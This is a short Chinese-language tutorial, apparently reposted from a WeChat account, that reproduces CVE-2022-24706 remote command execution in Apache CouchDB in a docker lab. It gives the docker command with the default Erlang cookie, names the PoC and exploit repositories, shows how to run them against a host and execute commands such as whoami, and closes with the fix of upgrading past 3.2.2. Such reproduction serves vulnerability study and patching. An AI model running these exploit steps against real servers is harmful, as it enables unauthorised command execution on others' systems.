受影响的Apache CouchDB版本为Apache CouchDB < 3.2.2
可通过docker直接部署漏洞环境
在linux中执行
docker run --rm -p 5984:5984 -p 4369:4369 -p 9100:9100 -d -e NODENAME=test -e 'ERL_FLAGS=-setcookie "monster"' couchdb:2.3.0
等待镜像拉取完成,待镜像拉取完成后,访问
http://ip:5984
出现以下界面代表环境部署成功
漏洞poc下载地址:
https://github.com/cckuailong/pocsploit/
待下载完成后,需先执行
pip3 install -r requirements.txt
安装程序运行所需的模块
CVE-2022-24706漏洞poc位于modules/cves/2022/CVE-2022-24706.py,执行命令
python pocsploit.py -iS "http://ip:5984/" -r "modules/cves/2022/CVE-2022-24706.py" --poc
出现以下信息代表目标存在漏洞
漏洞exp下载地址:
https://github.com/XmasSnowISBACK/CVE-2022-24706
下载完成后,进入exp目录,执行
python CVE-2022-24706-Exploit.py
输入host
输入需要执行的命令
例如whoami,出现命令执行结果代表利用成功
将Apache CouchDB升级到3.2.2版本以上
原文始发于微信公众号(第59号):CVE-2022-24706 Apache CouchDB 远程命令执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论